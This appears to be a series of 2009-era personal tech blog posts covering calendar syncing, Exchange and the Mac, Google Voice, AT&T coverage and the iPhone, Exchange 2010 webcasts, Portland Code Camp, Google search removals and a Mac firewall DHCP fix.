One of the upcoming online summits at BrightTalk is the Cloud Security Summit, which consists of a bunch of web conferences on September 30th.

You can visit the summit overview and schedule page here.

Lots of topics around security, legal issues and compliance in the context of cloud computing. Good stuff. Recently on RunAs Radio we have have had a couple discussions where cloud computing came up, too.

• RunAs Radio #126: Steve Riley is Up in the Clouds
• RunAs Radio #123: Andy Malone Battles Security in the Clouds

For a single mom with three kids, two of them teens, keeping a schedule is complicated enough. Add someone like me to the mix and things get out of hand pretty quick. Because that's the situation my soon-to-be-wife Laura and I have created, I've been asked/directed to figure out a good, friendly, reliable and especially non-geek-usable way to do shared calendars where everything just works. I think the term Wife Acceptance Factor is about to have very real, personal meaning in my life.

At any rate if you have any bright ideas let me know. Here is what I have come up with and am thinking about so far:

• Google Calendars on a new Google Apps domain - I have already acquired and set up a custom domain (ourfamily.cc) so we can have individual and shared calendars, docs, email, chat etc. in that environment. We want to share calendar details with each other, not the whole world.
  
• My other calendars at greghughes.net - I have this hodge-podge of Hosted Exchange and Google Apps Calendars on this domain. I will need to find a good way to sync and share the info without sharing it to everyone.
  
• Work calendar(s) - Typically on Exchange and accessed via Outlook, and I need to share only the free/busy data, and only for certain item categories to be appropriately security-conscious.
  
• TripIt calendar(s) - for travel arrangements, keeps things automagical and simple. Want to incorporate those.
  
• Access via Mac (iCal or Entourage), PC (Outlook), mobile phone (Android and iPhone) and via the web (Google Apps), with all the info always synced and up-to-date.
  

I've read over my friend Scott Hanselman's notes about how he has set up his system for similar needs, but that post is about a year old and he refers to some unnamed, secret-sounding plugins so I will need to touch base with him and see what he knows and thinks. In the podcast he and Carl Franklin recorded on the subject back in 2007, Scott noted "the fact that it's no trivial task and I struggled with it speaks to the state of Internet calendars in general." Surely things must have improved since then.

And then there's this blog post. Wow, uber-geekness.

I've used Google Calendar Sync before, but the laptop it ran on has since taken a long dive off a cliff and is no longer with us. I think I probably need to check out SyncMyCal, as it would allow me to be more granular than with Google's app. A comparison with Google Calendar Sync is here.

Someone really should write a tool that does all this or all of us, cross-platform, and make it all Automagical (tm). Anyone want to partner on a project?

What's worked for you? Anything? Let me know!

I’m an Exchange 2007 user. It’s terrific, works great and is truly the standard by which others are judged when it comes to business email, calendaring, contacts and other key business productivity features.

Being both a Mac and a PC guy, I’ve been the tester, owner and user of a variety of different applications to interface to Exchange. Outlook 2007 on the PC is a pretty obvious choice, and again it’s a standard by which others are often judged. But on the Mac I have been using Entourage for some time, with mixed opinion and results. It’s a good attempt at filling the gap left by the fact that there is no Outlook for the Mac, but it lacks in both features and stability.

However, on this fin gray Saturday morning I find myself once again examining the world of Exchange and the Mac. As I type this my Mac is going through the upgrade process and transforming itself into a Snow Leopard (OSX v10.6) machine. I’ve also downloaded the Entourage Web Services Edition upgrade from Microsoft, which is waiting on the Mac hard drive to install after the OS upgrade is completed.

My plan here is to set up and run under the new native-Exchange 2007 support in OSX Snow Leopard while at the same time checking out the new Entourage Web Services Edition features.

I should also note that earlier this month, Microsoft announced it will be releasing (finally!) a new Outlook client for the Mac in 2010. The expected “too late” crowd has been chiming in with their opinions, but in The Real World, where people older than 13 years actually make decisions about buying software for business use, this may be a big deal. It’s at least somewhat inevitable that Macs will become more common in the workplace, and the need for a consistent collaboration and productivity platform will full-fidelity, complete feature sets across OS platforms is critical to making business work.

I’ll post more details and thoughts once I get some of the setup and comparisons done over the next couple days. Meanwhile, I need to get packing some more cardboard boxes here at home so I can load them up… For anyone who might have noticed I have been absent from writing here, I am in the process of selling my house and will be getting married in October, so my world is a bit busy these days. But I am not gone. :)

Google Voice is awesome. It's the greatest service you can't get yet today. One number for all my phones, for life, replete with text messaging capabilities and a whole slew of cool features.

But, as much as I love Google Voice, I will stand on my soapbox here for a few moments to yell into the ether about a couple of glaring omissions in the current release that I think Google should address sooner rather than later: MMS message support, and support for sending a mobile message (whether SMS or MMS) to multiple recipients at the same time.

MMS messages are multimedia messages and are sent much like a text message. They're different than SMS message sin that they might include a video or a picture. Right now, if I want to receive a MMS message, I have to tell people to send them to my actual cell number, not my google voice number. Why? Because Google Voice quietly and calmly eats MMS messages, never to be seen again. This completely defeats the purpose behind the "one-number-for-them-all" story. So, it needs to change. When the iPhone on AT&T gets MMS service, which is likely to happen in July sometime, this need will become even more apparent and important.

MMS support could probably be delivered in two phases. Right now if you send a MMS message to the Google Voice number, it just disappears into the ether, and is never delivered anywhere. You don't even know someone tried and the sender assumes it was delivered. To rectify this, Google could do a first phase change where MMS messages would simply be forwarded in original form to the mobile phone(s) configured in the system, without worrying about displaying them in the Google Voice web interface. In a second phase they could then enable web-based viewing.

Second on my list is adding the ability to send an SMS (and MMS as a bonus) message to a group of recipients. We already have contact groups, and we can select more than one contact at a time in the web interface, but the option to send a SMS message disappears from the user interface as soon as you select more than one recipient. I regularly use SMS messages to notify members of a church youth group about meetings and other announcements as a group, so enabling a group-send as well as select-multiple to send SMS would be huge for me. As a bonus, provide me with a phone number that is virtually tied to that group so I can send one txt to my group number on my mobile phone.

What features would you like to see added to Google Voice?

The latest news via Unstrung's Michelle Donegan is that AT&T's 3G Microcell, which has been in a limited and private beta in the United States for a few months now, will be available in a sort of public beta in the coming weeks, in select (and as-yet unnamed) cities. The 3G Microcell is a device that you plus into your broadband connection at home. It has a 3G transceiver built in, and allows you to create a small cell area of coverage (hence the name "microcell" of course). I've written about it before, here and here.

From the news article:

According to AT&T's executive director for radio access network delivery, Gordon Mansfield, who was speaking at the Femtocells World Summit in London today, about 200 users are testing the femto service in targeted customer trials.

In the coming weeks, he added, "we will expand that into a marketing trial of the AT&T-branded 3G Microcell, which will be open to customers through our AT&T stores… in a handful of cities.

"We're on track for a full national launch by the end of 2009."

The equipment comes from network infrastructure equipment giant Cisco.

I'm hoping that Portland is one of the metro areas they include in the text phase, since my home has pretty much zero coverage. But I do have broadband and would truly benefit from the product.

AT&T plans to add a whole bunch of 850 Mhz spectrum to it's 3G service infrastructure, which should improve it's network performance and capacity substantially. Many have experienced the dropped call and unavailable network performance issues on AT&T's network, so this is a welcome change. But for those of us who simply live just outside the workable coverage area, the 3G Microcell will open even more doors for its customers.

Today Apple announced the next rev of the iPhone, the "iPhone 3GS." It has beefed up processing power and some cool new features like a better camera, more storage, etc.

Normally I'd be ultra excited about getting one as soon as its available. But this time around, I'm having a hard time getting inspired.

It has nothing to do with Apple's hardware and software. In fact, the processing power boosts and other changes are very, very tempting, and in a world where all else was equal it would be a no-brainer for me to drop the early upgrade cash on the table and move on up.

But the fact of the matter is, with AT&T's ultra-poor network performance on my current iPhone 3G, I think I'm better off waiting until Apple adds another U.S. carrier. I consistently have to turn off the 3G capabilities on iPhone 3G in order to avoid dropped calls and to successfully get network connections. That was the case with the first iPhone 3G I had, too. To top it all off, the service has gotten worse recently in my experience. I just can't see dropping that much cash for a new phone to operate on a network that already sucks. I've been sorely disappointed by AT&T, almost to the point where I want to call them and tell them they've consistently failed to perform to the level of service they claim (which is 100% the case).

It's time for Apple to drop that bomb on AT&T. Failure to perform in this case is going to cost Apple market share. It's got to be embarrassing to the company. During the announcements made today at Apple's World Wide Developer Conference, every time AT&T was mentioned the crowd just laughed. Seriously laughed, and not because there was a funny joke. It was because AT&T's quality is so lacking one just can' t help but either laugh or cry. They even laughed when AT&T was not mentioned - most notably with regard the fact that the carrier's logo was missing from some key slides in the presentation, pointing out AT&T's lack of launch time support for MMS and tethering, two of the key selling points for the new phone model.

AT&T has turned into that partner that Apple doesn't need, and shouldn't want. It's time to make a change. AT&T has simply failed to perform. When you can't reliably make and maintain calls and the data network won't keep a connection between towers, something's just not good enough. I hope Apple will step up - sooner rather than later - and add another carrier or two even before AT&T's exclusive agreement expires. It takes two to be successful in any partnership, and in this one AT&T's turned into a bit of a boat anchor.

What would change my mind on this one? Simple: When my current 3G phones work like they should on AT&Ts network, I'll be the first one to say so right here. Out loud and with conviction. But, I'm not holding my breath quite yet.Tmobile

Maybe a good jailbreaking and switch to Tmobile will work on the new OS and device. I'm sure someone will figure out out. Desperate times call for desperate measures. We shall see.

Shorthand used to be reserved for stenographers and people who took dictation or a lot of notes. But for the vast majority of us it was never fun. Remember those days? Now shorthand is cool again, but in text messages sent and received on cell phones. And it seems as if everyone under 25 is doing it (as well as some of us old people).

Parents, if you're lost in the world of texting because the abbreviated vocabulary is confusing, no worries. Mobile phone manufacturer LG has released a new web site that allows you to decode txt message slang, and you can use it at http://www.lgdtxtr.com/.

So now you can get a better handle on what your kids are up to. Enjoy.

Exchange Server 2010 is just around the corner, and Microsoft is gearing up to present a month of webcasts starting June 1st to introduce the new version to us. The webcast schedule is below. You can get the beta of Exchange Server 2010 here.

6/1/09 - 9:00am PT: TechNet Webcast: Exchange 2010 High Availability
Welcome to the future! The future of Exchange high availability, that is. In this webcast, we reveal the changes and improvements to the built-in high availability platform in Exchange Server 2010. Exchange 2010 includes a unified framework for high availability and disaster recovery that is quick to deploy and easy to manage. Learn about all of the new features in Exchange 2010 that make it the most resilient, highly available version of Exchange ever.

6/3/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Overview
This webcast will introduce you to Exchange Server 2010, reviewing the major areas of investment for this release and highlighting marquee features.

6/8/09 - 1:00pm PT: TechNet Webcast: Exchange 2010 Management Tools
Exchange 2010 includes new capabilities that make the operation of your Exchange environment more efficient. Learn how we've made the Exchange Management Console more powerful, extended the reach of PowerShell, and made it easier to delegate management tasks.

6/10/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Archiving and Retention
This webcast will introduce new ways to address archiving and retention with Exchange Server 2010.

6/15/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Outlook Web Access
Exchange 2010 brings new features and functionality to Outlook Web Access. See product demonstrations of the latest capabilities and understand how browser-based communication and collaboration gets better than ever in Exchange 2010.

6/17/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Architecture
This webcast describes the overall architecture of Exchange 2010 and key considerations for the scalability and performance of each server role. This webcast will provide the background and framework for the other Exchange 2010 webcasts, serving as a bridge between the overview session and drill-downs in each product area. This webcast is a recommended pre-requisite for the Exchange 2010 transition and deployment webcast.

6/22/09 - 9:00am PT: TechNet Webcast: Federation in Exchange 2010
Federation is a key part of the architecture of Exchange 2010, powering new organization-to-organization sharing scenarios. Learn how federation enhances the capabilities of Exchange 2010 and enables advanced coexistence between Exchange Server and Exchange Online.

6/24/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Voice Mail enabled by Unified Messaging
Exchange 2010 Unified Messaging is Microsoft's second generation unified messaging and voice mail solution. In this webcast, learn about the features, benefits, and architecture of Unified Messaging in Exchange 2010.

6/24/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Information Protection and Control
This webcast will introduce you to new ways to address information protection and control with Exchange Server 2010. A discussion of the use of encryption and rights management in parallel with Exchange will be included as well as an introduction to new functionality in Exchange that supports information protection scenarios.

7/1/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Transition and Deployment
In this session we will cover the migration planning and deployment path to move an organization from Exchange 2003 or Exchange 2007 to Exchange 2010.

If you're in or anywhere close to Portland, Oregon and you care about software development from a coder's perspective, there's a terrific (and FREE) event coming up on May 30th that you should definitely attend: Portland Code Camp 2009.

If you're interested in learning from cool, smart people or if you have some area of code passion you'd like to share with others (no experience necessary - seriously!), then go check it out and sign up now.

The 2009 Portland Code Camp is a free mini-conference that is a community-driven event by, and for people who write software. The event features sessions on all kinds of software and technologies, regardless of language, vendor, or platform. Code camp brings the software development community together, focusing on the common act of creating software. It is designed for all interest, all levels, and all ages.

Be a Presenter! The 2009 Portland Code Camp is a great opportunity to present a session on a piece of code, a technology, or a project that excites you. Share your knowledge and experience with others. If you've never presented in public before, code camp gives you a opportunity in a warm, friendly setting.

About this FREE Community Event in Portland

A. Concept. Portland Code Camp is a community event focused on the needs and interests of the developer community, and where we can learn from each other. Anyone is welcome to attend and anyone can propose a session on any development related topic. Final session selection is based on the interest expressed by those planning to attend. If the developer community is not interested in a topic, it just doesn’t make the ‘cut’.

B. Community. Portland Code Camp is about the developer community. ‘Real’ developers, not business interests guide all stages of planning for the event. And ‘real’ developers (those planning to attend) express their interest in session topics.

C. Cost. Portland Code Camp will always be ‘FREE’ to the developer community. There are no charges to attend any of the Portland Code Camp activities. We do raise funds from Sponsors, but Sponsors have no control over the sessions selected.

D. Sessions. Sessions may range from ‘white board’ discussions to down in the trenches coding. Session presenters should present materials that is their own original or derivative work, free of copyright encumbrances. All session materials, code samples, scripts, even slides, will be made available to attendees. Session presenters should only offer material, including code, that is available to re-use, adapt, and alter for the attendee’s own education, projects and even work.

E. Presenters. Anyone is encouraged to offer a presentation. Portland Code Camp provides a ‘low-key’ opportunity for inexperienced folks to make their first public presentation efforts. Some presenters will be experienced and some will be making their first public presentation. The Portland Code Camp audience is quite supportive of first time presenters. Most presenters will be from the Portland area, while a few may be from outside the area.

F. Code. Portland Code Camp sessions will focus on coding –with few exceptions. We encourage presenters to keep their presentations with the realm of ‘code’; a few sessions may have such informative value that they will be permitted without code. But such sessions will only occur if they garner sufficient interest (see paragraph ‘A’ above).

G. Schedule. Portland Code Camp occurs on evenings and weekends in order to reduce work related scheduling conflicts.

I recently took advantage of an in-store offer to replace my water-damaged 16GB iPhone 3G with a 8GB version for $199 with no contract extensions, just paid the money and walked out with it. And in my case I got to keep the old one, which makes a great WiFi-enabled MP3 player.

Apparently (according to reports) it's now official policy/program now for Apple stores to allow problematic iPhones where the water damage sensors (there are four of them) have been "tripped" (discolored do to extended water exposure) to be replaced with the same size and model for $199. That's a great move for people like me who do things like ski, boat and oh, I dunno... Live in the freakin' rain.

So, if you have a problematic iPhone that you have been told is not covered under warranty, you might be able to take advantage of this policy.

More info here.

When the now-long-forgotten HD disc format wars were just barely getting started, I jumped on the bandwagon early and bought the HD-DVD add-on drive for the Xbox 360 (at the original higher price, even). I also purchased a number of HD movies in the "Red" (HD-DVD) format and soon discovered the wonders of 1080p movies at home on the Xbox 360.

Ultimately, Blu-ray won the battle to determine which of the two competing formats would survive to become the industry standard. Today I rent Netflix movies in Blu-ray format whenever they are available, and there's nothing like the experience of great movies in high-definition in the home theater room with a 120-inch 1080p projected image and the sound cranked up.

I'm one of those people that buys movies I especially like or one that I'll want to watch again in the future. Unless it's really a favorite I'm more likely to rent from Netflix. Ever since the death of the red disc and the day I bought a PS3 (essentially to use as a Blu-ray player), I've wished I could play all my HD movies on the one device, just for simplicity's sake. But it doesn't work that way. I still hope for the day when a Blu-ray drive comes available for the Xbox 360, but I'm not holding my breath or anything.

Today I was reading blog posts from the past couple weeks and I saw that my friend Travis Illig recently mentioned a service from Warner Brothers called Red2Blu that allows you to take your HD-DVD's from that label and trade them in for the Blu-Ray version for a small fee per disc ($4.95). After creating a list of the Warner Brothers HD-DVDs you have at home on their web site and paying the upgrade fee with a credit card, you'll print out the PDF shipping label they provide, and then mail WB the cover art sleeves from the HD-DVDs you're converting to Blu-Ray. A FAQ covering common topics can be found here.

I just printed my shipping label and pulled all my cover art out of the HD-DVD cases. I'll ship it all off to WB tomorrow. It'll be nice to make the movie library a bit more consistent. I'll need to look to see if any of the other publishing companies have a similar program, but I was pleasantly surprised to find out that all but three of my HD-DVDs were from the WB label, so I'm pretty well covered. Here are the discs I'm able to convert:

Tech Crunch posted a list of Easter eggs - little hidden software treasures you have to search for inside a program to find. It's a good list, and has a few that I had forgotten about. Among those is what some say is the original software Easter egg (I beg to differ, it might be the first video game Easter egg - but we can save that for another day), from way back in 1979 in the Atari Adventure game (wow, I remember playing that one when it was new!).

Of course, Easter eggs aren't limited to software. DVDs have become a popular place to hide fun little things, too. The Lost DVDs are a good example of discs that have extra stuff you have to poke around to find. Web sites are also often sources of Easter egg fun, and http://www.eeggs.com/ is a good site to find out how to find the in a wide variety of places.

There are nine others in the TechCrunch list, plus a couple more scattered around in the (off-topic) comments. Check it out over at TechCrunch.com.

I had breakfast with a friend the other day. He's been writing some really cool iPhone apps and mentioned that he's wanting to focus for the future on apps that can be written and maintained cross-platform. He'll prefer to leave out the platform-specific "extra" functionality, he said, in order to be able to do the bulk of the work once and maximize the deployable surface area.

I got to thinking about this the rest of the day and came up with a whole list of questions for my friend. It's an interesting and logical approach, and certainly not wrong by any stretch of the means. Contrasted against the common move by devs to focus only on the iPhone platform for example, my friend's approach really makes me think. Now, to be clear, I have no idea what it takes to actually deploy an app to the iPhone and also have a version to deploy on Android or RIM devices, or on the upcoming Palm Pre (which looks really cool, by the way), or whatever. At least not without writing each one from scratch. My friend does, though. What I took from our conversation (as a business guy) was that it can be done at least to some extent, but that doing it in a cost-effective way means limiting functionality on any given platform. I may be oversimplifying, and in fact I probably am.

Then today I noticed that Mike Rowehl, who writes "This is Mobility," just posted an interesting article entitled "Please don't mistake my apathy for a lack of understanding," in which he takes on the recent meme suggesting that mobile developers are blindly leaving platforms other than Apple's behind, suck os Nokia's Ovi Store.

Which leads me to ask the obvious question: "What the heck is Nokia's Ovi Store?"

Granted, I'm not buying tons of mobile devices and deploying them like I used to, and certainly I'm not a mobile developer, but I'm still pretty well plugged-in (irony intended).

My past involvement in cross-platform development and porting of apps taught me that it's almost always a complicated and expensive endeavor. But it's not just building the app for the first time that one has to consider. Maintaining multiple platforms of the same app is can also be prohibitively expensive, unless there's a relatively simple and effective way to build once and deploy in many places/platforms. In the mobile world, it just isn't simple, cost effective and reliable enough (from what I can see).

And honestly, I want to choose the best devices and buy apps that take advantage of all the cool features those devices offer. I don't often want apps that leave out the latest hardware features and software enhancements.

Who's doing cross-platform mobile development and truly making it work? How are you doing it? If you've found the way, drop me a line - I'd like to hear about it.

For anyone who follows the "I always wait for the first service pack" method of deploying products, your excuse for waiting on SQL Server 2008 disappeared this past week, because SP1 for Microsoft SQL Server 2008 is now available.

Among the features, I like the slipstream install capability (install SQL server and the service pack in the same installation process), and the ability to uninstall the service pack separately.

Service Pack 1 for SQL Server 2008 is now available to customers. The Service pack is available via download at Download Center and is primarily a roll-up of Cumulative Updates 1 to 3 and minor fixes made in response to requests reported through the SQL Server community. While there are no new features in this service pack, customers running SQL Server 2008 should download and install SP1 to take advantage of the fixes which increase supportability and stability of SQL Server 2008.

The complete announcement is here.

UPDATE: We've had a great response and have assigned all of our beta invitations for the first round of testing, but please check the details below and let me know if you think you'd be able to help in a future phase!

I'm working with a software company to test some cool software that's currently in the early beta stage of development. The software is of a security nature and will be of interest to IT and security folks as well as individual computer users. We're looking for people with netbooks and notebook computers, especially ones with webcams built in, to test the software and provide feedback.

You'll be provided a test key and the beta software, and will need to honor the confidentiality provisions of the test program. It's nothing too complicated and the test risks are very small. You'll install the software, run through a few operational tests and let us know the results. We will ask first for technical results ("Did this work?") as well as your opinions and thoughts, should you wish to provide them.

What you'll need to provide and have available for the test:

• One or more notebook or netbook computers
• Computer(s) must be running Windows XP, Vista or Windows 7
• If it has a webcam built in, all the better (but not required)
• A Flickr account (basic account is fine)
• An email account and server information (for application configuration to allow sending of email alerts)

What you'll get as a result of testing and providing feedback:

• A free copy of the release version of the software when it's released (and you'll be glad you have it installed if your computer is ever lost or stolen, hint hint)
• Satisfaction and a sincere thank-you from me and the developers of the software

This software is quite interesting and has a lot of promise to provide real security value when it hits the streets, so we want to find as many complete test cases as we can. If you're interested, please email me at greg@greghughes.net and provide the details about your system, OS, etc - or call me at 503-766-2258. We are testing now, so let me know!

And thanks!

Since my last post, in which I predicted the newly-minted Google Voice service would be a real positive impact in my world, my Grand Central account was enabled for the upgrade to the new application and I have migrated to the service.

Greg’s One-Line Review: It’s pretty darned awesome.

But you probably want a little more detail than that, so here we go…

First of all, I should explain that I’ve used Grand Central for the past couple years. Grand Central was the centralized phone service that Google acquired some time back, and it allowed one number to ring multiple phones, with centralized voice mail, call screening and recording, etc.

Google Voice builds upon Grand Central by adding a number of new features, including a couple killer apps in my book: Text/SMS messaging and conference calling. Other enhancements include automated transcription of voice messages and a unified inbox for all your text messages and voice mails.

I live in a very rural area, far from the nearest cell phone tower. Mobile service on my iPhone is – for all intents and purposes – nonexistent at my house. If I put the phone up on a certain window sill and avoid moving it or touching it, I can get marginal service and might be able to receive text messages. But sending messages and making/receiving phone calls is next to impossible.

By giving people my Google Voice number (which is 503-766-2258 by the way), my friends and colleagues can send me text message and call me at one number, regardless of where I am and what services are available at my location. When someone calls the number, Google Voice rings my cell and home phones at the same time. I can add other phone numbers to the ring list, as well – on the fly. So, if I’m working from an office number I can add it to the list, no problem. I can define time periods to each phone, so individual phones ring only when I want them to.

I rely on text messaging for a lot of things, and many of my friends, family members and colleagues also rely on it to reach me. Needless to say, with poor wireless phone service at home, there are times when I don’t receive and cannot send text messages. That pretty much defeats the purpose of using text messaging to reach people in real time. With Google Voice, text messages send to my number are delivered to my phone and to my Google Voice Inbox, meaning even if the phone service prevents delivery, I get the text messages in my web browser and can reply to them there. That’s huge for me – and I have already taken advantage of the ability to send and receive text messages from my computer.

There are a few things I hoped I’d find in Google Voice that aren’t there, at least not there yet. I’m hopeful they’ll be added in the future:

• No support for sending text messages to groups – While you can create groups of contacts in the unified Google Voice inbox, you can only send messages to individual contacts. Since I lead a youth group at church, and we rely on text messaging to send out regular communications, I’d especially like to be able to send a single message to a group. As it is today, I can send a message to multiple contacts at once from my iPhone and just save the thread and keep replying to it, but when the group membership changes I have to start from scratch. It would be much easier and more reasonable to send to a single group managed in Google Voice.
• I’m a Google Apps user and have an Apps email account under the same Google account as the one I am using for Google Voice. I’m not sure why, but behavior is not as expected when I click on the Mail link at the top of the page from Google Voice. Rather than taking me to my Google Apps email inbox, it takes me to a page where it asks me to sign up for a GMail account. All other Google applications seem to understand where to go when that link is clicked, but this one doesn’t yet. I’m sure this is just early/beta stuff that needs to be worked out, but it also means my contacts are not synchronized across my Mail and Voice inboxes, which is unfortunate (they’ve already enabled unified contacts sync with GMail account inboxes).
• Support for syncing external contacts on the server side – While I was able to export my Outlook contacts, which are maintained on an Exchange server, as a CSV file and then import them without any issues into Google Voice, even better would be the ability to keep them up to date and in sync via the Google Voice service on the back end, maybe using ActiveSync or something similar. I’ll have to look for contact syncing software instead, since managing the sync effort by hand won’t really work for me.

All in all, Google Voice is a great app that’s already changing my ability to communicate. People in rural areas with marginal mobile service could really benefit from Google’s new offering. I’m looking forward to seeing what they deliver next!

I live in a remote location where you can barely get wireless service. I have to place my mobile phone on a window sill in just the right spot, and if I do that I will often get marginal service – enough to receive text messages most of the time, at least. Depending on the weather and atmospheric conditions, I sometimes get no signal at all.

There are two pieces of forthcoming technology that I plan to use to improve my situation as soon as they are available: Google Voice and the at&t 3G Microcell.

Google Voice was just announced late last week, and is an upgraded version of the services I already use via Grand Central, which Google acquired about a year and a half ago. Grand Central gives you one number and voicemail box for calls, and Google Voice expands in that by enabling SMS messages to the common number, with web and email access to the txt messages. I should note the service is free. The new features will be huge for me, since my ability to send and receive txt messages from home is limited at best, and often unreliable. I already have Grand Central routing voice calls to my home-office and cell phones at the same time, so the SMS addition will be welcome. Google is also adding voice mail transcription (machine transcribed) and some other nice features like built-in conference calling. They started upgrading people who already have Grand Central accounts a couple days ago, but mine has yet to be enabled for an upgrade. So, I am impatiently waiting. they say new users will be able to sign up in the coming weeks. More information about features available on Google Voice can be found here.

On another front, month or so ago, the tech news/rumor world was all excited about the pending at&t wireless 3G Microcell, which is a device that a user can plug into their broadband connection at home or in an office to create what amounts to a short-range personal wireless tower. I am luck enough to have terrific fast broadband service via a rural wireless transport provider called Cascade Networks, so I’ll be able to take advantage of the new at&t hardware when it’s available. Unfortunately, there’s been no news recently about availability of the 3G Microcell, but I’m hopeful it will be available soon. Having that available would enable me to consider shutting off my home phone service and possibly saving that monthly cost. The 3G Microcell is rumored to support data and voice for a few devices at a time, and who-knows in the cost department. All I know is it would improve my ability to communicate, which would be a welcome change.

More than once someone has asked me if there is a way to get Google to change their search results to exclude mean, inaccurate, defamatory, rude, or otherwise hard-to-swallow web pages. Often the desire motivating the question is legitimate, as someone has been smeared unfairly or - even worse - in a completely fabricated and malicious fashion, sometimes by anonymous online personalities.

The short answer is, "Probably not."

Now, before you think the proper solution is to have Google block the pages from their search results, it's important to understand that Google is not the Internet, and that it's not really making recommendations to you when it lists web pages that match what you're looking for. Rather, it's showing you an extensive list of links to content out there on the Internet that seems to match what you're looking for.

And that's what Google's search engine is: A way to find information created by other people and displayed on the Internet. It's not a filter that's meant to decide good from bad, who's right and who's wrong, who's lying or telling the truth, etc.

That said, there are things that Google works hard to avoid showing you. Spammy pages (especially ones that try to game Google's own advertising systems) are filtered out, and there are a couple topics that won't return results in their adsense and adwords advertising systems (just try to set up adsense on a site that sells or promoted firearms, for example). So they're not completely hands off, but for the most part they don't discriminate.

When you want to have a web page removed from the search listings at Google, the most effective (and almost the only) way to do so is to convince the person controlling the web page to change the information or remove it. If you can't get them to do that, it might be time to go to a court - assuming you have convincing proof that the page is inaccurate and/or malicious, etc.

Granted, if a judge sends Google a legal notice requiring them to take action, they'll probably do so. But good luck getting a judge to agree to do that.

Always go after the source of the problem. It's not Google's fault that some mean person posted a page that says you're a jerk and thief (even though you're not). But you might be able to convince a judge that the person you claim is defaming you should change or remove the page. If that happens, Google's indexing bots will automatically update the search results the net time they crawl the offending pages and see the content has changed.

Matt Cutts has a good article (with a great graphic) discussing this. Here's a brief excerpt of what Matt tells people when they ask him the same question:

We really don’t want to be taking sides in a he-said/she-said dispute, so that’s why we typically say “Get the page fixed, changed, or removed on the web and then Google will update our index with those changes the next time that we crawl that page.”

His post prompted me to think about this again since I get this type of question several times a year. Just keep in mind that while it's an emotionally difficult thing to have someone write mean things and lies about you for all to see, it's a relatively clinical process to try to get that information changed or removed. Just make sure you stay calm and look to the right people to help with driving those changes.

Google's official page that addresses how to remove content from the company's search results is located at:

http://www.google.com/support/webmasters/bin/answer.py?answer=136868

I dropped into a Starbucks this afternoon, all prepared to get some emails written and to get some work done between my Sunday afternoon and evening commitments. Everything was fresh in my mind and ready to go via the keyboard and onto the screen. I fetched my grande two-pump sugar-free vanilla skinny latte and sat down in the chair, opened the laptop and watched it wake up and connect to the AT&T wireless access point.

But much to my dismay nothing would load over the network. The AirPort icon in the status bar showed the name of the network and indicated that I was connected to the access point, but I had no connection to the Internet.

After a brief bit of trying over and over to load a web page, I checked the network preferences in the apple system preferences panel and found that I was not getting an IP address. The Mac was self-assigning a 169.* address, which is a non-routable local-only address. I tried restarting the AirPort card in the Mac, but that didn't help. I then found I was able to connect normally with my iPhone to the AT&T WiFi network and get a "real" IP address (192.x), so I quickly deduced that something was wrong with my Mac.

I had to give up on troubleshooting and head back out into the world, but I spent the rest of the day wondering if maybe there was something about the MAC address for my wireless card that AT&T had chosen to hate. After finishing my day of activities, I drove home this evening and fired my laptop back up. It connected to my home wireless network. But again, no IP address assigned. Hmm, definitely the laptop.

I started thinking now. What could be happening? Powering the AirPort on and off, shutting down the Mac and powering it back up, manually telling the network stack to renew it's DHCP lease - all these things did no good.

I finally decided to take a look at the Mac firewall logs. You'd think that would be the first place I'd look, being a security guy. They're kind of hidden in plain sight, a few layers deep in the Mac's preferences dialogs. You go to the System Preferences panel, in the Security section, then the Firewall tab, then click the Advanced button, and finally click the Open Log button. If logging isn't already turned on, you can enable it there, as well.

Sure enough, I looked in the log and found several examples of this (emphasis mine):

Feb 8 23:02:04 greg-hughess-macbook-air Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
Feb 8 23:02:26: --- last message repeated 2 times ---

Ah hah... Apparently the firewall was refusing inbound connections initiated by the router as it tried to set up the DHCP address being requested by the laptop. The configd daemon is a service that handles configuration changes for various pieces of the system, mostly all network-related. Great, I had something to fix!

I first confirmed configd was in fact running, then deleted the firewall configuration file (located at /Library/Preferences/com.apple.alf.plist) and configured the firewall to temporarily allow all connections, and then back to allowing essential services. Sure enough, as soon as I made the changes the Mac was able to get a DHCP address from the router, and the network was back up and working.

I have no real idea how the firewall got messed up. At one point I had it set to configure access for specific services and apps, so that might have had something to do with it. But it's strange that this problem only started today. It's possible the configd process was denied by a rule, I suppose. Perhaps I hit a key on a pop-up dialog to deny firewall access to the daemon without even realizing it while typing?

At any rate, it seems to be working now (as evidenced by the fact that I am able to post this blog entry, of course) and hopefully it will continue to work as expected. Maybe this will help someone else troubleshoot a similar issue.

Good or bad, we live and work in an increasingly binary world.

More and more I notice our collective bipolar mentality. Everything is completely one extreme or another, with no time or thought put into the idea that there might be something much more realistic and reasonable in-between. It's black or it's white. You're conservative or you're liberal. It's all the way on or it's shut completely off. It's awesomely great or it's despairingly terrible.

What happened to the various shades and levels of gray, moderation and good? Perhaps this is a result of our increasingly computer-centric boolean society, where everything at it's core can be distilled down to one's and zero's, on and off, yes or no - with nothing in-between. But the organic world has never worked that way, and I think maybe we're seeing the signs that people have forgotten to look for the compromise.

One case in point, among many: A blog article today at TechCrunch reports that management at a large company, Nielson, has decided to remove the Reply-All button from all instances of outlook. Apparently some executive committee decided this would reduce waste and increase productivity. Certainly they must be right: It's a technology problem, right? Whoever the person was that thought of the reply-all concept originally couldn't possibly have been thinking about the consequences of including this feature. They must have been misguided, unknowing and wrong.

Or were they?

To take such drastic action as to completely remove the reply-all button from Outlook seems - well - misguided, unknowing and wrong. It takes a people problem, assumes (incorrectly) that it's a technology problem, and in the end creates a new - and potentially larger - business problem.

Don't get me wrong. I hate rampant reply-all email threads as much as anyone, maybe even more so. I especially dislike the passive-aggressive, nasty, insolent and rude behavior that people often use (often, ironically, in a reply-all email) to try to tell people how much they dislike email spam. If I'm copied on a business topic thread that I don't feel the need to review and would especially like to avoid, I don't like it. But I really hate it when people include me on their angry extension of the thread where they insult the original sender and complain. At least the original thread had a business purpose.

As a senior manager, several times I've replied-to-all to say "This thread is closed, please restrict the distribution of future info those those who are needed." In every case, the goal was to get people to stop and think. It almost always worked.

